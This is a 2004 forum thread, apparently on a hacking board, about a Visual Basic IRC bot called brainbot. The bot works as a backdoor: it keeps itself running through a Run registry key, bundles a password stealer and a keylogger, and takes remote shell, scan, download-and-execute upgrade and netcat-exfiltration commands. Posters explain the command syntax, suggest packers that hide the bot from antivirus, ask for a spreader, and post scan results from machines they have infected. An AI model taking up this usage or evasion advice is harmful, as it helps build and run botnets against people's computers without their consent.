hmm ive tried it on 10 server remotely... but no one joins the network.. can you make something like a startuplog?
thank you!
securitydood
Jul 21 2004, 05:07 PM
helped to code a similar bot myself in TCL using mirc ... going to look at this thanks very much will post some comments etc if there's anything to add
passtheblunt
Jul 22 2004, 04:22 AM
QUOTE (brainbuster @ Jul 1 2004, 07:45 PM)
use following parameters: Usage: !scan <Option> [THREADS]
Could someone help a noobie out with this parameter stuff on the ip scanner ?I have played with it for hours but I still cant enter the commands right Really all I probably need is a full line command as if you was typing to the bot , for instance I want to scan for optix using the -opx cmd with ip range of 172.0.0.0-172.255.255.255 , (oh and what are [THREADS] ?) How would I type this line for line to the bot ? , by the way great tool M8 .
-=[Romulus]=-
Jul 23 2004, 12:36 PM
yes like pikamar i'm wondering if tha is possible to have a password string too,coze now lots of chan are password protected.
Hehe pikamar ya un baille que je t pas vu....
CBK power
MChakaL
Jul 23 2004, 01:43 PM
It's possible to share the source to optimize the code ? =D
brainbuster
Jul 24 2004, 05:05 PM
Hi guys ... just dmade a little update
NEW: you can chose a fixed base-nick now.. leave it blank and a random one will be used.
new command:
QUOTE
!sendscan <Your IP> <NC Port> The bot will connect to <Your IP> <NC Port> and echo the dfind results to it You have to start nc with this parameters before: nc -l -p <port> >>dfind =D
cause there were many questions here is an example of using !scan: !scan -opx 192.168.0.1 192.168.0.5 ..... will scan for optix-boxes... use all the commands this way
i justwonder why my firewall tells me it wants to connect to www.google.com via http *?*
this is done for making sure internet connection stands =)
braini
Jul 24 2004, 07:13 PM
QUOTE (brainbuster @ Jul 24 2004, 05:05 PM)
Hi guys ... just dmade a little update
NEW: you can chose a fixed base-nick now.. leave it blank and a random one will be used.
new command:
QUOTE
!sendscan <Your IP> <NC Port> The bot will connect to <Your IP> <NC Port> and echo the dfind results to it You have to start nc with this parameters before: nc -l -p <port> >>dfind =D
cause there were many questions here is an example of using !scan: !scan -opx 192.168.0.1 192.168.0.5 ..... will scan for optix-boxes... use all the commands this way
i justwonder why my firewall tells me it wants to connect to www.google.com via http *?*
this is done for making sure internet connection stands =)
nice to see this one updated.. link is passwd protected?
brainbuster
Jul 24 2004, 07:37 PM
oh i'm sry... was the wrong link^^ changed it =D
Serhat
Jul 25 2004, 07:43 AM
tested it in a sec.. and works GREAT cool (for me) that it is Visualbasic.. some packers work good with Visualbasic and will make it undetectable easily.. (I hope)... Thanks for sharing m8 =) I am a bit busy in visualbasic myself.. learning the stuff.. and I like it.. (you must start somewhere.. will go to C/C+ etc later )
Serhat
passtheblunt
Jul 25 2004, 09:14 AM
QUOTE (Serhat @ Jul 25 2004, 07:43 AM)
tested it in a sec.. and works GREAT cool (for me) that it is Visualbasic.. some packers work good with Visualbasic and will make it undetectable easily.. (I hope)... Thanks for sharing m8 =) I am a bit busy in visualbasic myself.. learning the stuff.. and I like it.. (you must start somewhere.. will go to C/C+ etc later )
Serhat
Kind of off topic but what other packer are good to use on VB programs other than the obvious upx packer ? All the ones I try corrupt the program
Serhat
Jul 25 2004, 09:34 AM
it all depends.. you must try various ones... UPX is detected by AV's cause they can unpack the UPX compressed EXE .. if you try a less known one there is more chance it won't get detected.. did it with a Subseven Client once.. and guess what.. it didn't get detected by Norton/Mcafee and even Kaspersky Anyway could be this EXE has problems with packers though.. not all files work 100% with those packers.. but in general some packers can compress VisualBasic stuff okay
Serhat
[PS] I am woundering to say the truth how you made that configurable exe file in visualbasic.. reading/writing the settings to it etc.. I see you made an ocx for it also.. seems cool for me.. I am just a n00b in coding =X
dando
Jul 25 2004, 01:14 PM
dude your !raw thing doesnt worked i tried: !raw /msg NICK hey doesnt work i tried !raw /q NICk yo doesnt work either and i tried !raw /j CHANNEL 1 doesnt work. wtf is worng mate? Btw great bot
brainbuster
Jul 25 2004, 01:18 PM
write it like !raw msg nick test the / is just a part of mirc not of the irc protocol write the raw commands without /
Serhat
Jul 25 2004, 02:51 PM
QUOTE (dando @ Jul 25 2004, 01:14 PM)
dude your !raw thing doesnt worked i tried: !raw /msg NICK hey doesnt work i tried !raw /q NICk yo doesnt work either and i tried !raw /j CHANNEL 1 doesnt work. wtf is worng mate? Btw great bot
like brainbuster said.. it's MIRC which is making "/msg nick hey" into "PRIVMSG NICK hey"... so it is working.. I tried it out.. "PRIVMSG CHAN hey" works also.. no other command needed if you want to message an channel...
Serhat
dando
Jul 25 2004, 04:18 PM
oh alright guys thx allot BTw brain mate your bot is real something special, lots of bots hed problems starting them self after restart[and i tried allot]but ur is live and kicking after sevral restart's i got allot of bots running already with the bot u made, good job indeed:) hhh And nice updates. EDIT: just got another problem look: <dando> !RAW PRIVMSG dando The bot wont give me the all sentence <Golani> The
look when im saying to the bot say something to some1[i tried it on other dude also] hes just saying the first word, Wtf is worng? is it some bug or i can overcome this one? [there is a way,just write the words togeter,EXample: YEA_MAN_WSUP] let me know how it goes.
Serhat
Jul 25 2004, 04:30 PM
QUOTE (dando @ Jul 25 2004, 04:18 PM)
oh alright guys thx allot BTw brain mate your bot is real something special, lots of bots hed problems starting them self after restart[and i tried allot]but ur is live and kicking after sevral restart's i got allot of bots running already with the bot u made, good job indeed:) hhh And nice updates. EDIT: just got another problem look: <dando> !RAW PRIVMSG dando The bot wont give me the all sentence <Golani> The
look when im saying to the bot say something to some1[i tried it on other dude also] hes just saying the first word, Wtf is worng? is it some bug or i can overcome this one? [there is a way,just write the words togeter,EXample: YEA_MAN_WSUP] let me know how it goes.
Kinda same with MIRC... When I do /raw PRIVMSG NICK test test.. he just received test.. and if I use /raw PRIVMSG NICK "TEST TEST" .. he just receives "TEST ... so think it's something else m8.. something with the server side.. maybe a special way of doing so.. like in IE we use %20 .. and in IRC it's another one .. maybe? not a bug in the app..
Serhat
[EDIT] Found it out by reading all the packets mirc send.. try !raw PRIVMSG :test test it works
dando
Jul 25 2004, 04:45 PM
<dando> !raw PRIVMSG dando :test test <Mamram> command PRIVMSG dando sent! lol i didnt get any msg even this time:) hhhh. when i do: !RAW PRIVEMSG dando test test i get <Mamram> test but when i do what u said i get nothinG! u sure u were correcT?
Krozgen
Jul 25 2004, 05:14 PM
QUOTE
<dando> !raw PRIVMSG dando :test test <Mamram> command PRIVMSG dando sent! lol i didnt get any msg even this time:) hhhh. when i do: !RAW PRIVEMSG dando test test i get <Mamram> test but when i do what u said i get nothinG! u sure u were correcT?
Dando, I've been coding a long time (c, c++, VB, C#...) also a heavy computer user, like most of the people here. The IRC protocol, or the way your messages are formatted before going to the server, were slightly hard to understand. If you use mIRC (which I assume you do), a quick way to understand it is to use the /debug command, I'm pretty sure it's a fairly standard one. Use it like so:
/debug @debug
ALL commands going in and out, in their RAW form, will be displayed in the @debug window. Yes, the command is PRIVMSG Target :message here ... note that you only need the colon if it's more than one word, but it can't hurt to always have it. If you want to know the full protocol of connecting to a server, it goes roughly like this:
telnet o IRCserver.net 6667 -- wait a little bit for some incoming msgs -- USER i@am.special woot hey :yay NICK nicknamehere -- wait a little for the MOTD and such -- JOIN #channelhere -- wait until you've gotten the topic + such from the channel -- PRIVMSG #channel :haha my message works! /\ or /\ PRIVMSG nickname :haha, this is a private message
note: to leave a chan, PART #channel note: to disconnect, if memory serves, the command is QUIT note: though i forget the exact syntax, you all know the /me command does an "action", well, that's exactly the RAW command (action), although I don't remember the exact syntax. If you use colors in the channel, it'll display to your telnet window as its ascii equivalent, once again I can't remember exactly what it is, but you'll see
Have a nice time of it, and remember; learn something new every day!
passi
Jul 25 2004, 05:37 PM
Great work!
Btw: I am a VB coder, too (i made the sqlexec thing). If you want I would help you to build in more functions feel free to contact me
//OK nice bot Could you fix there things?
1) In the server builder in the IRCServer field replace the "anyIRC" with an example server adress, so that the user know how the this string must look like. i.e. irc.ircserver.com
2) The IRCPort box can be placed behind the IP box, seperated with a ":"
3) The "Channel: #" text field: Change the Caption to "Channel:" and write into the textbox "#yourchan"
4) Fixed name: Give an example please
5) I don't think that the masterpass field must be like this: ***** If you want to keep this, make sure you check every letter for the KeyDown event with "CapsLock". So that a msgBox appears when the CapsLock button is beeing pressed
6) Please include a logging function to the server. Because when the Server doesn't work correct you can check the brainbot.log what happened. You can make a checkbox into the server builder to disable/enable it Some time ago i wrote a very comfortable module in VB for logging. Contact me via ICQ and i will give it to you
7) Is a autostart function included?
So, that's it. I got some free time ^^
Serhat
Jul 25 2004, 07:15 PM
QUOTE (dando @ Jul 25 2004, 04:45 PM)
<dando> !raw PRIVMSG dando :test test <Mamram> command PRIVMSG dando sent! lol i didnt get any msg even this time:) hhhh. when i do: !RAW PRIVEMSG dando test test i get <Mamram> test but when i do what u said i get nothinG! u sure u were correcT?
Well it works in MIRC..
QUOTE
/debug @debug
Ty.. learned something again
Serhat
dando
Jul 25 2004, 07:17 PM
First of all to the 1st programer, yea i got it how the irc thing working:) thx allot 4 the help:D this debug thing is cool thx again. but i dont understand how can it sole my problem with the bot. 4 the other guy[passiw ] here is 2 answers about 2 question: 4: i think he ment a bot nick.like u can call him passiw_BOT understand?insted of random nick [if u leave it blank in that case] 7:Yea i seen it heepens a computer was restarted few times.and it went back after every restart,good bot.
brainbuster
Jul 25 2004, 08:43 PM
QUOTE
Great work!
Btw: I am a VB coder, too (i made the sqlexec thing). If you want I would help you to build in more functions feel free to contact me
//OK nice bot Could you fix there things?
1) In the server builder in the IRCServer field replace the "anyIRC" with an example server adress, so that the user know how the this string must look like. i.e. irc.ircserver.com
2) The IRCPort box can be placed behind the IP box, seperated with a ":"
3) The "Channel: #" text field: Change the Caption to "Channel:" and write into the textbox "#yourchan"
4) Fixed name: Give an example please
5) I don't think that the masterpass field must be like this: ***** If you want to keep this, make sure you check every letter for the KeyDown event with "CapsLock". So that a msgBox appears when the CapsLock button is beeing pressed
6) Please include a logging function to the server. Because when the Server doesn't work correct you can check the brainbot.log what happened. You can make a checkbox into the server builder to disable/enable it Some time ago i wrote a very comfortable module in VB for logging. Contact me via ICQ and i will give it to you
@passiw lol .. many orders =) but I'll take care of them in next version =)
and yea an autostart function is included... or what did you think should the regristry name thing stands for?
dando
Jul 25 2004, 10:16 PM
Brain buster?can u plz tell me how im suppuse to msg a person? when im doing !raw privemsg NICK yea man yo all im geting is the first word["yea"] wtf is worng man?????????
Serhat
Jul 26 2004, 05:14 AM
QUOTE (dando @ Jul 25 2004, 10:16 PM)
Brain buster?can u plz tell me how im suppuse to msg a person? when im doing !raw privemsg NICK yea man yo all im geting is the first word["yea"] wtf is worng man?????????
read above you need to use the.. : but Brainbuster I think I found why it still doesn't MESSAGE the full message I guess it doesn't send the stuff after :
so everything after : doesn't gets send to the server.. you maybe know why? cause normal /raw PRIVMSG #Chan :hey hey Works in mIRC
Serhat
oxydrine
Jul 26 2004, 11:03 AM
Just ideas =
1- Insert to dfind command to delete scan results 'cause, each scan are screened when used !showscan
2- make db or site registration where which user can register to have new release of ur branbot, or post in GSO each new releazes, or your hotmail will be explosed lol
think its the better bot we have since botmaking but let's increase devellopments, link it with 101 to developp it
See u Soon
brainbuster
Jul 26 2004, 11:07 AM
@oxydrine use : !shell del dfind
@Serhat gonna work on that raw command problems
dando
Jul 26 2004, 01:28 PM
yo dudes the :word's thingy doesnt work even when i add : its no good
oxydrine
Jul 26 2004, 02:10 PM
QUOTE
[16:02] <Oxydrine> !shell del D:\WINNT22\dfind [16:02] <Box004> command executed [16:02] <Oxydrine> !showscan [16:02] <Box004> scanresults: [16:02] <Box004> ==BEGIN== [16:02] <Box004> COMMAND: D:\WINNT22\lEXPLORE.exe -wdv 2XX.XXX.1.1 2XX.XXX.1.1 10 [16:02] <Box004> 2XX.XXX.55.136 found WebDav enabled [16:02] <Box004> 2XX.XXX.55.137 found WebDav enabled [16:02] <Box004> 2XX.XXX.55.141 found WebDav enabled [16:02] <Box004> 2XX.XXX.55.139 found WebDav enabled [16:02] <Box004> 2XX.XXX.55.142 found WebDav enabled [16:02] <Box004> 2XX.XXX.161.18 found WebDav enabled [16:02] <Box004> 2XX.XXX.161.37 found WebDav enabled [16:02] <Box004> ==END==
or
[16:03] <Oxydrine> !shell del dfind [16:03] <Box004> command executed [16:03] <Oxydrine> !showscan [16:03] <Box004> scanresults: [16:03] <Box004> ==BEGIN== [16:03] <Box004> COMMAND: D:\WINNT22\lEXPLORE.exe -wdv 2XX.XXX.1.1 2XX.XXX.1.1 10 [16:03] <Box004> 2XX.XXX.55.136 found WebDav enabled [16:03] <Box004> 2XX.XXX.55.137 found WebDav enabled [16:03] <Box004> 2XX.XXX.55.141 found WebDav enabled [16:03] <Box004> 2XX.XXX.55.139 found WebDav enabled [16:03] <Box004> 2XX.XXX.55.142 found WebDav enabled [16:03] <Box004> 2XX.XXX.161.18 found WebDav enabled [16:03] <Box004> 2XX.XXX.161.37 found WebDav enabled [16:03] <Box004> ==END==
sorry but didnt affect
brainbuster
Jul 26 2004, 04:44 PM
in that case the dfind.exe is still started cuz the scan didn't end and has "dfind" file open so the file cant be deleted. u understand?
Chizo
Jul 26 2004, 09:49 PM
Nice tool guy! Please include a spreader and you are my god! I love this n1 tool!
bye Chizo
Serhat
Jul 26 2004, 10:21 PM
QUOTE (dando @ Jul 26 2004, 01:28 PM)
yo dudes the :word's thingy doesnt work even when i add : its no good
read above
Serhat
sevenvirtues
Jul 27 2004, 12:08 AM
Hi,
i was able to acquire this source code for a bot in vb. unfortunately i dont know that much in vb programming. im still new in prorgamming and right now in school we are still in C.
maybe you guys can help me figure this out and teach me how to compile and make this work. then il also read some articles about vb programming and buy the Microsft visual basic 6.0
brainbuster: maybe you can get some of the codes from this bot. i DONT own the code but i think its open source since i was able to download it freely and as it is.
But I hope no one will code a second Bot. Better improve the actual bot to work a 'lil bit better
brainbuster
Jul 27 2004, 03:25 PM
made a little website for the brainbot... cuz it sux postin every update on gso =) URL is : http://www.brainbot.de.vu/
Stephen79
Jul 27 2004, 06:54 PM
only just spotted this thread.
This is a great builder package and a great bot. Its about the 1st one I have tested, and I am very impressed.
One suggestion I would like to make would be have the option of changing where you install it to.
great work.
plztouchmymonkey
Jul 28 2004, 11:13 PM
how would one uninstall this ircbot?
Serhat
Jul 29 2004, 05:43 AM
QUOTE (plztouchmymonkey @ Jul 28 2004, 11:13 PM)
how would one uninstall this ircbot?
just login to the bot in your irc channel by doing !login (pass)
and after the password is accepted use !uninstall and done.. it will quit the server and also remove itself... if you want to do it manually.. just go to your windows folder.. delete the exe file you named @ the setup of the bot.. also delete the regkey in the RUN section... also pspv.exe (protected storage passview if I am not mistaken) .. and it should be oke..
Serhat
Stephen79
Jul 29 2004, 09:02 AM
QUOTE (Serhat @ Jul 29 2004, 06:43 AM)
QUOTE (plztouchmymonkey @ Jul 28 2004, 11:13 PM)
how would one uninstall this ircbot?
just login to the bot in your irc channel by doing !login (pass)
and after the password is accepted use !uninstall and done.. it will quit the server and also remove itself... if you want to do it manually.. just go to your windows folder.. delete the exe file you named @ the setup of the bot.. also delete the regkey in the RUN section... also pspv.exe (protected storage passview if I am not mistaken) .. and it should be oke..
Serhat
if your doing it manually, dont forget to remove the reg entry that auto starts it.
MysteryMan
Jul 29 2004, 09:22 AM
can you do to bot can talk ????? i mean you write something in his private and he tell this on channel what do you think ? if you wanna make this i think this will be good option
cheerz
brainbuster
Jul 29 2004, 01:22 PM
new version avaivable =)
QUOTE
=========== Changes in new update::
-upgraded dfind to 0.8 -added randomnized ident ,so bots cant get banned by ident
New commands:
!upgrade <upgradeURL> <upgradeURL> is the URL of the new brainbot server. it will be downloaded and executed while the old infection is removed. this way u can easy upgrade to another brainbot version or start using another rat/bot
!op <channel> <nick> gives <nick> +o in <channel> of course only if bot has op in that channel.
!deop <?channel?> <nick> gives <nick> -o in <channel> (deop's him =D) of course only if bot has op in that channel.
!msg <Nick/chan> <message> Sends <message> to the chosen nick or chan =)
!killscan stops the current scanningprocess. so u can clear the scanlogs by typing !shell del dfind ===========
get it at www.brainbot.de.vu
Stephen79
Jul 29 2004, 02:05 PM
Nce addons
I like the !op feature.
I would really like to see an option to change the install path though
oxydrine
Jul 29 2004, 02:38 PM
wonderfull upgrade !
thx
oxydrine
Jul 29 2004, 05:25 PM
another idea for next update :
more than one admin to command bot
AsuKa
Jul 29 2004, 05:43 PM
Great work Brainbuster. Alot of nice feature.
The only suggestions I have so far are:
!free, give the option to chose which drive
!nick, using this option only temp. changes the nick until the next time it connects. Would it be possible to make this a perm. change, or does it have to be changed using the server builder and reloading it on the machine?
Anyways, keep up the good work, you have a nice little bot going.
oxydrine
Jul 29 2004, 06:14 PM
on new version the nick is fixed U can modify when is on irc but name is fixed on gui
!free for all drives is cool peharps in new version
funy
Jul 29 2004, 08:25 PM
yeah very nice bot, and thx for addon
Serhat
Jul 29 2004, 10:32 PM
QUOTE (Stephen79 @ Jul 29 2004, 09:02 AM)
if your doing it manually, dont forget to remove the reg entry that auto starts it.
and after the password is accepted use !uninstall and done.. it will quit the server and also remove itself... if you want to do it manually.. just go to your windows folder.. delete the exe file you named @ the setup of the bot.. also delete the regkey in the RUN section... also pspv.exe (protected storage passview if I am not mistaken) .. and it should be oke..
------------
Sorry I think I didn't clearly tell it.. but it's there =)
Serhat
Serhat
Jul 29 2004, 10:55 PM
QUOTE (brainbuster @ Jul 29 2004, 01:22 PM)
!msg <Nick/chan> <message>
yes works Though still the one word bug is still there =)
you can try to add the following.. that you can choose an icon of the server yourself.. atleast for the IRCbot.exe.. not for the standard bootload.exe.. the setup icon is cool Also IRCbot.exe got in his description "govsec" and some other stuff.. which might be a bit obvious... Also an option to add multiple Masters.. like if you use different nicks.. and you want the bot to reply to both Also.. !TYPE command like in DOS (TYPE).. !TYPE (file) Will send the content of the file.. handy if you want to check a log file of an application you ran .. Like the way with tthe keylogger function
CODE
[Begin] TExt in the text file you want to read Another line =D [END]
Serhat
[EDIT] Sorry for 2 posts ;x
[EDIT2]
QUOTE (Oxydrine)
another idea for next update :
more than one admin to command bot
Lol didn't saw this one ^^
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Really all I probably need is a full line command as if you was typing to the bot , for instance I want to scan for optix using the -opx cmd with ip range of 172.0.0.0-172.255.255.255 , (oh and what are [THREADS] ?) How would I type this line for line to the bot ? , by the way great tool M8 .
